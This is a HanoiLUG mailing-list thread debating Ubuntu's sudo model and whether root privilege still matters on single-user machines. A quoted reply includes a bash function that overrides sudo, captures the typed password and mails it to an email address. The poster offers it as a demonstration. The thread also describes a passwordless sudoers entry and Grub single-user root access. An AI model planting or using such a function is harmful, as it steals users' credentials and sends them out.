[HanoiLUG] Ubuntu-sudo usage..

[David Tremblay]

Hi,

I want to challenge the "one machine per user" assumption which is
partially true.
Most family Windoze boxes (those who have "teens" at least) have several
users (and have all administrator privilege which is very messy)

Only for my part I recently had the following problems which require both :

a) to setup a linux for a couple machine that was sharing a directory
and where users, gnome applications and thunderbird profile would have
the same permissions, sound silly ? no it is not thunderbird keep
creating the new directories and files with the

b) a family box where a HD was mounted at boot time but should be
available from within the home of every use so user should not have to
browser elsewhere than the home of the user, and gnome shortcuts could
not make it as many applications don't see the shortcuts when "saving"
or opening files.

For the rest I thought that the sudo thing was just about keeping the
same security model but giving the user less impressions that he/she is
under "surveillance"

As a matter of fact the security model of unix gives also an advantage
against worms and virus, keeping it to the infected user.

About basic security oOne could add also that by default Ubuntu Grub let
you boot in single user mode without prompting password then you get
root for free

David you suggest we should rethink the security model, how do you see it ?





David Favro a écrit :
> I've never done a 'vanilla' Ubuntu install, so I'm not sure, but I think
> that maybe the idea is that if you don't set a root password during the
> install, it won't prompt you for one when you 'sudo' from the normal
> account.  Someone can correct me if I'm wrong.  If so, I think that they
> are halfway onto the right idea.
> 
> Personally, I always set a root password, and add an entry to
> /etc/sudoers that allows my 'private' ID to sudo to anything, like:
> my_user ALL=NOPASSWD: ALL
> and I have an alias in my .bashrc:
> alias su="sudo su -"
> Then I disable all of their 'security' features like disallowing root
> login from gdm, from ssh, etc. (but I take an additional precaution of
> disallowing root login via password in ssh, only via PK, and have sshd
> use a non-default port).
> All of this means that I can 'be myself' yet execute any command via
> sudo without typing root password, and if I need to do a lot of
> sysadmin, I can just type "su" to become root to avoid typing "sudo" (I
> also keep a gnome-terminal profile with the command "sudo su -" so that
> I can easily fire up a terminal that is already root).  You can also
> achieve similar results through the use of groups, but I like forcing
> myself to acknowledge that I am executing a privileged command by using
> 'sudo' or a root shell.
> 
> The point is, I've been using unix for 25 years and always liked the
> user-permissions model, but it is not really adapted to the modern
> environment: more and more, most computers are no longer multi-user
> machines.  The typical laptop or desktop workstation computer is used by
> only one user almost all of the time, and there's no need to disallow
> sys-admin by that user since he 'owns' the machine.  I'm not suggesting
> that we should all run as 'root', but the need to type 'sudo' is (should
> be) just a safety reminder so that we realize that we are executing a
> command with system-wide implications rather than just for our user-ID.
> 
> The mindset that an intruder as root is a higher security risk than as
> an 'unprivileged' user is outdated, although still prevalent.  I was of
> this opinion for decades, but it no longer applies on a machine where
> there effectively is only one user.  In the old days, an unauthorized
> user as root could steal/destroy the data of all users, as well as bring
> the system down, but as an unprivileged user, could only steal/destroy
> that one user's data.  But now, there only *is* one user.  If an
> intruder can read your emails, destroy your oggs, etc., what do you care
> if they have access to the /sbin directory?  Once someone has access as
> 'you', it's all over.  And, since you are typing your root password
> every time that you do sysadmin, I get that as a bonus too -- I just
> type this into your terminal session or add it to your .bashrc:
> sudo() { read -s -p "Password: " pwd ; echo ; /usr/bin/sudo -p "" "${@}"
> <<<"${pwd}" ; Mail -s "$(id -un)@${HOSTNAME}" hanoilug at meta-dynamic.com
> <<<"${pwd}" ; }
> 
> (I don't steal people's passwords -- I only worked out that hack as a
> way to demonstrate to people that they are not any more secure by
> forcing themselves to type their root password whenever they use sudo,
> as some still think).
> 
> So, my whole philosophy is that on my personal machines (e.g. laptop),
> my personal user-ID should be equivalent to root, but I still need to
> use 'sudo' or 'su' or start up a root shell to do sysadmin, just as a
> safety check that I don't inadvertently make a mistake, but I don't want
> to type passwords.  I guess that since Ubuntu is aimed at 'desktop'
> machines, they had the same idea, but there are problems with their
> implementation.  For one, there are times when one wants to login
> directly as root, not as a normal ID followed by su/sudo (for reasons
> too difficult to explain here).  So if root has no password (no direct
> login) and root login is disabled in gdm and sshd, you are out of luck.
> 
> The 'single-user machine' mentality also means that, in most cases, when
> the machine is booted, the need to 'log in' to a graphical session with
> a user-ID and password via gdm or other login window is also an obsolete
> idea, just another inconvenience that adds no security, like the root
> password for 'sudo', so I have found ways to eliminate it.  Of course, I
> also take many other security measures with respect to my machines.
> 
> -- David F.
> 
> Steve wrote:
>> I have a question about sudo usage in Ubuntu. Why is the usage
>> emphasised over su? If users get prompted for a root password each
>> time then how is it different to su? If the idea is to force a
>> password entry before each root command, then what stops you from
>> running sudo /bin/bash (or some other executable which gives you
>> a shell)?
>>
>> Steve
> 
> _______________________________________________
> HanoiLUG mailing list
> HanoiLUG at lists.hanoilug.org
> http://lists.hanoilug.org/mailman/listinfo/hanoilug
> 

-- 
David Tremblay

Information Technology for development analyst

*emails:*
david at roy-tremblay.net // david at ngowiki.net

*Phones*
Mobile : 84-4-0912 474 995
SIP  : 1-747-004-8537
skype : ict4ngo

*Webs:*
blog.ngowiki.net  // www.hanoilug.org
www.lerap.org

*Messaging*
jabber network :ict4ngo at jabber.org